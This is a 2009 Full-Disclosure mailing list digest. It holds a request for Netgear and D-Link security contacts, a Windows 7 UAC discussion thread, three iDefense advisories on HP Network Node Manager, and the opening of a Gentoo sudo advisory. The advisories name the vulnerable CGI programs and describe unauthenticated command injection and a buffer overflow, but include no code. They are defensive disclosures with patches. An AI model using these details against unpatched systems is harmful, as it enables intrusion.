2009-01-19 14:12 GMT-6 "We are not interested in vulnerabilities affecting D-Link at this time." Case Opened 2008-12-28 07:57 GMT-6 Case Closed 2009-01-15 17:01 GMT-6 "After some deliberation we have unfortunately decided that we won't be accepting bugs affecting NetGear products." Contacting mitre.org, asking for CVE and a contact at D-Link: Mo, 2.02.2009, 13:01 Contacting mitre.org and NetGear asking for CVE and contact: Mo, 2.02.2009, 12:55 pressrelations at netgear.com (OSVDB entry in the contact field) coley at linus.mitre.org (cc, found by googling) No replies so far. Maybe NetGear and D-Link could consider to work together with the OSVDB to enter at least some valid contact data. Somebody interested into Router issues (and no it's no xss...)? The vendor itself seam to not to care about their customers or security... Kind regards, Rembrandt -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 833 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090206/f5f1a1a3/attachment.bin From anonymouspimp at gmail.com Fri Feb 6 16:31:10 2009 From: anonymouspimp at gmail.com (anonymous pimp) Date: Fri, 6 Feb 2009 18:31:10 +0200 Subject: [Full-disclosure] Security contacts at Netgear and/or D-Link? (DoS, pos. default PWs and other issues) In-Reply-To: <20090206170154.07cc41e9.rembrandt@jpberlin.de> References: <20090206170154.07cc41e9.rembrandt@jpberlin.de> Message-ID: <2d792fb20902060831g621a26dctfb2578c9cc592114@mail.gmail.com> On Fri, Feb 6, 2009 at 6:01 PM, rembrandt wrote: > Is somebody aware of security contacts at Netgear or D-Link? > > Products of those vendors do suffer from possible DoS, propably default > hardcoded root accounts (D-Link) and other issues. > > [...] > Kind regards, > Rembrandt > yeah at justfuckinggoogleit.com Kind regards. From shawnmer at gmail.com Fri Feb 6 17:00:56 2009 From: shawnmer at gmail.com (Shawn Merdinger) Date: Fri, 6 Feb 2009 12:00:56 -0500 Subject: [Full-disclosure] Security contacts at Netgear and/or D-Link? (DoS, pos. default PWs and other issues) In-Reply-To: <20090206170154.07cc41e9.rembrandt@jpberlin.de> References: <20090206170154.07cc41e9.rembrandt@jpberlin.de> Message-ID: On Fri, Feb 6, 2009 at 11:01 AM, rembrandt wrote: > Is somebody aware of security contacts at Netgear or D-Link? > > Products of those vendors do suffer from possible DoS, propably default > hardcoded root accounts (D-Link) and other issues. > > > Timeline: > > ZDI: > Case Opened 2009-01-18 04:24 GMT-6 > Case Closed 2009-01-19 14:12 GMT-6 > "We are not interested in vulnerabilities affecting D-Link at this > time." Maybe contact http://security.dlink.com.tw so they can create IPS signatures for their NetDefend products? ;-) --sc, From ureleet at gmail.com Fri Feb 6 17:18:30 2009 From: ureleet at gmail.com (Ureleet) Date: Fri, 6 Feb 2009 12:18:30 -0500 Subject: [Full-disclosure] Fwd: MI5 are watching you, indeed In-Reply-To: <4b6ee9310902050924m13d98243t665fcec685e041da@mail.gmail.com> References: <4b6ee9310902050924m13d98243t665fcec685e041da@mail.gmail.com> Message-ID: <6158bb410902060918t39599430n8edb132659589d05@mail.gmail.com> just in case any1 else is being threatned by this kid. ---------- Forwarded message ---------- From: andrew.wallace Date: Thu, Feb 5, 2009 at 12:24 PM Subject: MI5 are watching you, indeed To: Ureleet From ureleet at gmail.com Fri Feb 6 17:20:47 2009 From: ureleet at gmail.com (Ureleet) Date: Fri, 6 Feb 2009 12:20:47 -0500 Subject: [Full-disclosure] Windows 7 UAC compromised In-Reply-To: <99936.1233673785@turing-police.cc.vt.edu> References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu> <003d01c9856a$a3bd2780$eb377680$@co.uk> <6158bb410902030648t173c6ad2ufa40a952cb491a6f@mail.gmail.com> <99936.1233673785@turing-police.cc.vt.edu> Message-ID: <6158bb410902060920u3b3843een68318c7e2553e859@mail.gmail.com> ms just needs to tell the developers. look, we are going to do this, heres the coding, heres the new api's conform or get left back. theyll conform. On Tue, Feb 3, 2009 at 10:09 AM, wrote: > On Tue, 03 Feb 2009 09:48:48 EST, Ureleet said: >> y not have ur os secure in the first place and designed with full >> permissions instead of bothering the user. look at linux, look at >> unix. theyve been doing it 4 years. > > Well, that *would* be an alternate way to design a system - but how would > you migrate an existing Windows box to a Windows 8 that did that? There is > *such* a mass of software written specifically around all the cruft in the > Windows APIs that the inertia is the single biggest reason people keep running > Windows boxes. > From ureleet at gmail.com Fri Feb 6 17:46:19 2009 From: ureleet at gmail.com (Ureleet) Date: Fri, 6 Feb 2009 12:46:19 -0500 Subject: [Full-disclosure] Windows 7 UAC compromised In-Reply-To: References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu> <003d01c9856a$a3bd2780$eb377680$@co.uk> <6158bb410902030648t173c6ad2ufa40a952cb491a6f@mail.gmail.com> <99936.1233673785@turing-police.cc.vt.edu> <6158bb410902060920u3b3843een68318c7e2553e859@mail.gmail.com> Message-ID: <6158bb410902060946v71838b3fhe5e89f3e717cba86@mail.gmail.com> doesnt this work for other oses? On Fri, Feb 6, 2009 at 12:42 PM, Andy McKnight wrote: > > > 2009/2/6 Ureleet >> >> ms just needs to tell the developers. look, we are going to do this, >> heres the coding, heres the new api's conform or get left back. >> >> theyll conform. > > Yeah, I can see how that conversation will pan out. > > MS -> App Developers > "Yeah, well, we''re pretty much doing away with what you're used to so your > app isn't going to work the next Windows release. We need to do this to > improve security, it'll be worth it for everyone in the long run. Meantime, > you're gonig to need to recode your app." > > App Developers -> End User > "Microsoft broke our app." > > End User > "God damn Microsoft. That new OS is crap, nothing works on it. I won't be > investing any of my hard earned cash on their new OS." > > If an end user's current apps don't work on the new OS, chances are they > won't upgrade. It's not Microsoft that can drive app developers to recode > for a new OS, it's got to be the end user. > > From andy.mcknight at gmail.com Fri Feb 6 17:42:52 2009 From: andy.mcknight at gmail.com (Andy McKnight) Date: Fri, 6 Feb 2009 17:42:52 +0000 Subject: [Full-disclosure] Windows 7 UAC compromised In-Reply-To: <6158bb410902060920u3b3843een68318c7e2553e859@mail.gmail.com> References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu> <003d01c9856a$a3bd2780$eb377680$@co.uk> <6158bb410902030648t173c6ad2ufa40a952cb491a6f@mail.gmail.com> <99936.1233673785@turing-police.cc.vt.edu> <6158bb410902060920u3b3843een68318c7e2553e859@mail.gmail.com> Message-ID: 2009/2/6 Ureleet > ms just needs to tell the developers. look, we are going to do this, > heres the coding, heres the new api's conform or get left back. > > theyll conform. > Yeah, I can see how that conversation will pan out. MS -> App Developers "Yeah, well, we''re pretty much doing away with what you're used to so your app isn't going to work the next Windows release. We need to do this to improve security, it'll be worth it for everyone in the long run. Meantime, you're gonig to need to recode your app." App Developers -> End User "Microsoft broke our app." End User "God damn Microsoft. That new OS is crap, nothing works on it. I won't be investing any of my hard earned cash on their new OS." If an end user's current apps don't work on the new OS, chances are they won't upgrade. It's not Microsoft that can drive app developers to recode for a new OS, it's got to be the end user. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090206/44539d92/attachment.html From Valdis.Kletnieks at vt.edu Fri Feb 6 17:51:58 2009 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Fri, 06 Feb 2009 12:51:58 -0500 Subject: [Full-disclosure] Windows 7 UAC compromised In-Reply-To: Your message of "Fri, 06 Feb 2009 17:42:52 GMT." References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu> <003d01c9856a$a3bd2780$eb377680$@co.uk> <6158bb410902030648t173c6ad2ufa40a952cb491a6f@mail.gmail.com> <99936.1233673785@turing-police.cc.vt.edu> <6158bb410902060920u3b3843een68318c7e2553e859@mail.gmail.com> Message-ID: <87091.1233942718@turing-police.cc.vt.edu> On Fri, 06 Feb 2009 17:42:52 GMT, Andy McKnight said: > Yeah, I can see how that conversation will pan out. > > MS -> App Developers > "Yeah, well, we''re pretty much doing away with what you're used to so your > app isn't going to work the next Windows release. We need to do this to > improve security, it'll be worth it for everyone in the long run. Meantime, > you're gonig to need to recode your app." > > App Developers -> End User > "Microsoft broke our app." > > End User > "God damn Microsoft. That new OS is crap, nothing works on it. I won't be > investing any of my hard earned cash on their new OS." Exactly - and the *only* thing that MS cares about is getting your hard earned cash. That's why they didn't fix this in Vista, or XP, or ME, or W2K, or NT 4, or.... The unbelievers are welcome to look at how many corporate sites have drunk the Vista kook-aid - very few. About the only Vista sales MS has is the ones they've had pre-loaded onto computers as they leave the factory. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 226 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090206/a959c17b/attachment.bin From andy.mcknight at gmail.com Fri Feb 6 17:58:12 2009 From: andy.mcknight at gmail.com (Andy McKnight) Date: Fri, 6 Feb 2009 17:58:12 +0000 Subject: [Full-disclosure] Windows 7 UAC compromised In-Reply-To: <6158bb410902060946v71838b3fhe5e89f3e717cba86@mail.gmail.com> References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu> <003d01c9856a$a3bd2780$eb377680$@co.uk> <6158bb410902030648t173c6ad2ufa40a952cb491a6f@mail.gmail.com> <99936.1233673785@turing-police.cc.vt.edu> <6158bb410902060920u3b3843een68318c7e2553e859@mail.gmail.com> <6158bb410902060946v71838b3fhe5e89f3e717cba86@mail.gmail.com> Message-ID: 2009/2/6 Ureleet > doesnt this work for other oses? Windows is different in this respect. The number of Windows users who don't know/care (or *want* to know) what goes on under the hood is *huge*. As long as their current setup allows them to *do their job* then they're not going to buy into any upgrade that risks breaking that. That's what's important to them. The biggest driver behind upgrading a Windows OS isn't a new release, or security improvements or a fancy GUI. It's hardware replacement. Even this was/is stretched with XP with the extended shipment dates and various downgrade options you can *still* get on new boxes. The only people that can really force app developers to change overnight* and code for a new, secure Windows OS mostly don't care about it. That leaves Microsoft to try and drip feed gradual change that improves the situation without rocking the boat. *relatively. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090206/4a47892e/attachment.html From vigilantgregorius at gmail.com Fri Feb 6 18:02:56 2009 From: vigilantgregorius at gmail.com (Miller Grey) Date: Fri, 6 Feb 2009 12:02:56 -0600 Subject: [Full-disclosure] Windows 7 UAC compromised In-Reply-To: References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu> <003d01c9856a$a3bd2780$eb377680$@co.uk> <6158bb410902030648t173c6ad2ufa40a952cb491a6f@mail.gmail.com> <99936.1233673785@turing-police.cc.vt.edu> <6158bb410902060920u3b3843een68318c7e2553e859@mail.gmail.com> <6158bb410902060946v71838b3fhe5e89f3e717cba86@mail.gmail.com> Message-ID: ...knowing all this, how does it get fixed? What is the proper way for MS to enforce UAC? On Fri, Feb 6, 2009 at 11:58 AM, Andy McKnight wrote: > > > 2009/2/6 Ureleet > >> doesnt this work for other oses? > > > Windows is different in this respect. The number of Windows users who > don't know/care (or *want* to know) what goes on under the hood is *huge*. > As long as their current setup allows them to *do their job* then they're > not going to buy into any upgrade that risks breaking that. That's what's > important to them. > > The biggest driver behind upgrading a Windows OS isn't a new release, or > security improvements or a fancy GUI. It's hardware replacement. Even this > was/is stretched with XP with the extended shipment dates and various > downgrade options you can *still* get on new boxes. > > The only people that can really force app developers to change overnight* > and code for a new, secure Windows OS mostly don't care about it. That > leaves Microsoft to try and drip feed gradual change that improves the > situation without rocking the boat. > > *relatively. > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090206/a1cb3626/attachment.html From Valdis.Kletnieks at vt.edu Fri Feb 6 18:07:40 2009 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Fri, 06 Feb 2009 13:07:40 -0500 Subject: [Full-disclosure] Windows 7 UAC compromised In-Reply-To: Your message of "Fri, 06 Feb 2009 12:46:19 EST." <6158bb410902060946v71838b3fhe5e89f3e717cba86@mail.gmail.com> References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu> <003d01c9856a$a3bd2780$eb377680$@co.uk> <6158bb410902030648t173c6ad2ufa40a952cb491a6f@mail.gmail.com> <99936.1233673785@turing-police.cc.vt.edu> <6158bb410902060920u3b3843een68318c7e2553e859@mail.gmail.com> <6158bb410902060946v71838b3fhe5e89f3e717cba86@mail.gmail.com> Message-ID: <88045.1233943660@turing-police.cc.vt.edu> On Fri, 06 Feb 2009 12:46:19 EST, Ureleet said: > doesnt this work for other oses? Much of the competition are all Unix/Linux based, and as such the APIs are *very* similar from one to another. As a result, you get 2 effects: 1) MacOX, Solaris, RedHat Enterprise (and so on) all have mostly the same POSIX API, so a vendor can get stuff working on one, and have a pretty easy time moving to another. If you're being careful in your coding and avoiding most of the weirder vendor-specific extensions, moving from (for instance) Solaris to RHEL is actually easier than XP->Vista. So if your OS vendor screws the pooch, you can often get your application for another system. 2) Since there *isn't* as strong a lock-in as with a Microsoft OS, all the OS vendors have a big incentive to *not* screw the pooch by making radical incompatible changes - they get done in evolutionary compatible ways. And since the OS is all open-source, an enhancement done by one vendor will eventually show up in the others if it's a useful feature (there's been a number of things that have over the years crossed from Linux into the *BSD/Darwin/OSX world and visa versa). Also, most of the open-source companies have a totally different business model. They can't make much money selling me open-source bits - what we pay them for is *support*. I hit a bug, but I have better things to do than track it down - I throw it at the vendor, and they do the bugfixing and ship me a new version. A new release of OpenOffice comes out, with different pre-requisites, I pay the vendor to sort it all out and build it to save me the time and effort. So Microsoft has good economic reasons to *not* fix stuff so they keep their customers captive - while RedHat's survival depends on them shipping me stuff that *works*. Different market niche, different mindset, different results. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 226 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090206/1bad57ba/attachment.bin From Valdis.Kletnieks at vt.edu Fri Feb 6 18:14:59 2009 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Fri, 06 Feb 2009 13:14:59 -0500 Subject: [Full-disclosure] Windows 7 UAC compromised In-Reply-To: Your message of "Fri, 06 Feb 2009 12:02:56 CST." References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu> <003d01c9856a$a3bd2780$eb377680$@co.uk> <6158bb410902030648t173c6ad2ufa40a952cb491a6f@mail.gmail.com> <99936.1233673785@turing-police.cc.vt.edu> <6158bb410902060920u3b3843een68318c7e2553e859@mail.gmail.com> <6158bb410902060946v71838b3fhe5e89f3e717cba86@mail.gmail.com> Message-ID: <88499.1233944099@turing-police.cc.vt.edu> On Fri, 06 Feb 2009 12:02:56 CST, Miller Grey said: > ...knowing all this, how does it get fixed? What is the proper way for MS > to enforce UAC? I'm quite frankly not convinced that there is in fact any economically feasible way for MS to ship a "proper" UAC. Both Vista and the upcoming Windows 7 were at first seen by outsiders as a good chance for MS to do the needed disruptive house cleaning, and they didn't do it for either of those releases. They still took a major beating on their cash flow with the Vista failure, and it would have been worse if it had been the amount of changes that were needed to actually fix things. And since there's a good chance that the world economy will remain in the toilet until after the follow-on for Windows 7 arrives, I'm not holding my breath for MS to do the major clean-up there either. There's good reason to suspect that they will *never* actually do so. Bottom line: MS can do only one of the following: 1) Ship something that fixes UAC (and all the other related issues) 2) Ship something that fixes their profit/loss sheets. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 226 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090206/9be68db4/attachment.bin From andy.mcknight at gmail.com Fri Feb 6 18:20:08 2009 From: andy.mcknight at gmail.com (Andy McKnight) Date: Fri, 6 Feb 2009 18:20:08 +0000 Subject: [Full-disclosure] Windows 7 UAC compromised In-Reply-To: References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu> <003d01c9856a$a3bd2780$eb377680$@co.uk> <6158bb410902030648t173c6ad2ufa40a952cb491a6f@mail.gmail.com> <99936.1233673785@turing-police.cc.vt.edu> <6158bb410902060920u3b3843een68318c7e2553e859@mail.gmail.com> <6158bb410902060946v71838b3fhe5e89f3e717cba86@mail.gmail.com> Message-ID: 2009/2/6 Miller Grey > ...knowing all this, how does it get fixed? What is the proper way for MS > to enforce UAC? > They need to put a version of UAC in place that will alert the user when a process is trying to make a change that weakens the overall security posture of the box. They need *only* alert the user when this change is with malicious intent. They need to elimiate all false positives. Good luck with that. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090206/b3982a8e/attachment.html From labs-no-reply at idefense.com Fri Feb 6 20:18:50 2009 From: labs-no-reply at idefense.com (iDefense Labs) Date: Fri, 06 Feb 2009 15:18:50 -0500 Subject: [Full-disclosure] iDefense Security Advisory 02.06.09: HP Network Node Manager Multiple Command Injection Vulnerabilities Message-ID: <498C9B2A.2050401@idefense.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 iDefense Security Advisory 02.06.09 http://labs.idefense.com/intelligence/vulnerabilities/ Feb 06, 2009 I. BACKGROUND HP Network Node Manager (NNM) is an application suite that is used to map out and manage network topography. NNM runs on a variety of platforms, including Linux and multiple versions of Windows. For more information, see the vendor's site found at the following link. http://www.openview.hp.com/products/nnm/index.html II. DESCRIPTION Remote exploitation of multiple command injection vulnerabilities in Hewlett-Packard Development Co. LP (HP)'s Network Node Manager, could allow an attacker to execute arbitrary code with the privileges of the affected service. Multiple command injection vulnerabilities are present in NNM CGI applications. The vulnerabilities are very similar and occur in the webappmon.exe and OpenView5.exe program. Part of the functionality of these applications is to start other programs and collect their output. In order to perform this, they each execute external programs along with any attacker controllable arguments for the application. The arguments may contain shell meta-characters. This allows an attacker to run arbitrary shell commands. The arguments are not filtered before being passed to the external program. This results in attacker supplied commands being run on the host. III. ANALYSIS Exploitation of these vulnerabilities results in the execution of arbitrary code with the privileges of the affected service. On RedHat Enterprise 4, the application is started as the user 'bin'. All that is required for exploitation is the ability to create a TCP connection to port 80 on the targeted host. IV. DETECTION iDefense has confirmed the existence of these vulnerabilities in Network Node Manager version 7.53 for Linux. Previous versions, as well as versions for other Unix based operating systems, may also be affected. V. WORKAROUND By default, the NNM CGI applications do not require a user to be authenticated. By changing the session.conf file and setting UserLogin to ON, it is possible to require valid credentials in order to run. The 'ovhtpasswd' application can then be used to add valid credentials to the password file. VI. VENDOR RESPONSE HP has released a patch which addresses this issue. For more information, consult their advisory at the following URL. http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01661610 VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-4559 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 06/19/2008 Initial Contact 06/19/2008 Vendor Case numbers set 07/10/2008 PoC sent 01/22/2009 Vendor says patch is ready 02/05/2009 Requested CVE from vendor 02/05/2009 Requested date coordination 02/06/2009 Coordinated Public Disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright ? 2009 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFJjJsnbjs6HoxIfBkRAtdEAKD0ZM7MTAY0CC5mWXCotzVG8wUKcgCfSGQc hHbbBHyuDQTBkUKzc48cDw0= =Re4N -----END PGP SIGNATURE----- From labs-no-reply at idefense.com Fri Feb 6 21:19:34 2009 From: labs-no-reply at idefense.com (iDefense Labs) Date: Fri, 06 Feb 2009 16:19:34 -0500 Subject: [Full-disclosure] iDefense Security Advisory 02.06.09: HP Network Node Manager ovlaunch CGI BSS Overflow Vulnerability Message-ID: <498CA966.8000303@idefense.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 iDefense Security Advisory 02.06.09 http://labs.idefense.com/intelligence/vulnerabilities/ Feb 06, 2009 I. BACKGROUND HP Network Node Manager (NNM) is an application suite that is used to map out and manage network topography. NNM runs on a variety of platforms, including Linux and multiple versions of Windows. For more information, see the vendor's site found at the following link. http://www.openview.hp.com/products/nnm/index.html II. DESCRIPTION Remote exploitation of a BSS based buffer overflow vulnerability in Hewlett-Packard Development Co. LP (HP)'s Network Node Manager could allow an attacker to execute arbitrary code with the privileges of the affected service. The vulnerability exists within the 'ovlaunch' CGI application, which is used to launch the remote user interface. By sending a specially crafted request, it is possible to trigger a buffer overflow. The vulnerability results from an unchecked function call. The buffer that is overflowed makes it possible to overwrite various pointers that are located after the buffer in memory. III. ANALYSIS Exploitation of this vulnerability results in the execution of arbitrary code with the privileges of the affected service. IIS runs CGI applications with reduced privileges, so a full system compromise is not possible using only this vulnerability. In iDefense Labs testing, it was possible to overwrite various pointers stored after the overflowed buffer. Given this, code execution is likely to be possible. IV. DETECTION iDefense has confirmed the existence of this vulnerability in Network Node Manager version 7.53 for Windows. Previous versions may also be affected. The Linux version of 'ovlaunch' contains the vulnerable code, but it is not triggered. The actual hostname is used instead of the attacker supplied 'Host' parameter. V. WORKAROUND Requiring authentication by modifying the session.conf file is not a valid workaround for this vulnerability. The vulnerability occurs during the parsing of requests, before any authentication checks. However, it is possible to use the IIS configuration manager to require authentication in order to execute the ovlaunch CGI. Additionally, the IIS configuration manager can be used to limit connections by IP address. VI. VENDOR RESPONSE Hewlett-Packard Development Co. LP (HP) has released a patch which addresses this issue. For more information, consult their advisory at the following URL. http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01661610 VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-4562 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 06/19/2008 Initial Contact 06/19/2008 Vendor Case # SSRT080092 set 07/10/2008 PoC sent 01/22/2009 Vendor says patch is ready 02/05/2009 Requested CVE 02/05/2009 Requested date coordination 02/06/2009 Coordinated Public Disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright ? 2009 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFJjKlkbjs6HoxIfBkRAvHqAKDp4srtr0q+CZGGHhWJqmqKy1nW4QCg7++E u046RSbr7d7Y2LhOd24nkO4= =oXQE -----END PGP SIGNATURE----- From labs-no-reply at idefense.com Fri Feb 6 21:00:05 2009 From: labs-no-reply at idefense.com (iDefense Labs) Date: Fri, 06 Feb 2009 16:00:05 -0500 Subject: [Full-disclosure] iDefense Security Advisory 02.06.09: HP Network Node Manager Multiple Information Disclosure Vulnerabilities Message-ID: <498CA4D5.40109@idefense.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 iDefense Security Advisory 02.06.09 http://labs.idefense.com/intelligence/vulnerabilities/ Feb 06, 2009 I. BACKGROUND HP Network Node Manager (NNM) is an application suite that is used to map out and manage network topography. NNM runs on a variety of platforms, including Linux and multiple versions of Windows. For more information, see the vendor's site found at the following link. http://www.openview.hp.com/products/nnm/index.html II. DESCRIPTION Remote exploitation of multiple information disclosure vulnerabilities in Hewlett-Packard Development Co. LP (HP)'s Network Node Manager could allow an attacker to gain access to sensitive information. Two vulnerabilities exist within the CGI applications distributed with NNM. The first vulnerability exists in the nnmRptConfig.exe CGI application. When responding to specifically crafted requests, the CGI will disclose the location of log directories. The second vulnerability exists within the ovlaunch.exe CGI. If a parameter is incorrectly set in a specific request, the application will return various configuration details. III. ANALYSIS Exploitation of these vulnerabilities results in the disclosure of sensitive information. While the direct effects of these vulnerabilities are minimal, they may be useful to an attacker attempting to exploit other vulnerabilities. IV. DETECTION iDefense has confirmed the existence of these vulnerabilities in Network Node Manager version 7.53 for Linux and Windows. Previous versions may also be affected. V. WORKAROUND iDefense is currently unaware of any workarounds for these issues. VI. VENDOR RESPONSE Hewlett-Packard has released a patch which addresses this issue. For more information, consult their advisory at the following URL. http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01661610 VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-4560 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 06/19/2008 Initial Contact 06/19/2008 Vendor Case # SSRT080095 set 07/10/2008 PoC sent 01/22/2009 Vendor says patch is ready 02/05/2009 Requested CVE from vendor 02/05/2009 Requested date coordination 02/06/2009 Coordinated Public Disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright ? 2009 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFJjKTTbjs6HoxIfBkRAn+nAJ0YusPTHicFnJpCKBIMwhEsg26p2wCdGZM3 12udAN07EiZpKlRihYGh0LA= =z792 -----END PGP SIGNATURE----- From krymson at gmail.com Fri Feb 6 22:22:21 2009 From: krymson at gmail.com (Michael Krymson) Date: Fri, 6 Feb 2009 16:22:21 -0600 Subject: [Full-disclosure] Windows 7 UAC compromised In-Reply-To: <88499.1233944099@turing-police.cc.vt.edu> References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <003d01c9856a$a3bd2780$eb377680$@co.uk> <6158bb410902030648t173c6ad2ufa40a952cb491a6f@mail.gmail.com> <99936.1233673785@turing-police.cc.vt.edu> <6158bb410902060920u3b3843een68318c7e2553e859@mail.gmail.com> <6158bb410902060946v71838b3fhe5e89f3e717cba86@mail.gmail.com> <88499.1233944099@turing-police.cc.vt.edu> Message-ID: I'm with Valdis on this one. You have to understand that Windows is probably as popular as it is now very largely *because* of the freedom the OS offered people *and* software makers to do what they want with it. This is not entirely different from DRM vs Unrestricted media... In order for Microsoft to do anything proper about it, they would have to splinter their market and either piss off software makers that depend upon the ease of use, or piss of users who want freedom to put whatever app they want on their system or make whatever changes without aggravation. And any major off-putting change would give many people and businesses a reason to explore alternatives... One thing in our (and Microsoft's) favor towards securing the end user experience is the growing number of people who realize two things. It's their own fault when their system gets stupidly slow because Windows lets them be stupid. And as people "grow up" into computers they reealize they only really do 10 things on them and only really need 10 different apps. On Fri, Feb 6, 2009 at 12:14 PM, wrote: > On Fri, 06 Feb 2009 12:02:56 CST, Miller Grey said: > > > ...knowing all this, how does it get fixed? What is the proper way for > MS > > to enforce UAC? > > I'm quite frankly not convinced that there is in fact any economically > feasible > way for MS to ship a "proper" UAC. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090206/ffe7d54c/attachment.html From keytoaster at gentoo.org Fri Feb 6 22:21:57 2009 From: keytoaster at gentoo.org (Tobias Heinlein) Date: Fri, 06 Feb 2009 23:21:57 +0100 Subject: [Full-disclosure] [ GLSA 200902-01 ] sudo: Privilege escalation Message-ID: <498CB805.6030803@gentoo.org> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200902-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: sudo: Privilege escalation Date: February 06, 2009 Bugs: #256633 ID: 200902-01 - - - - - - - - - - - - - - - - - - - - - 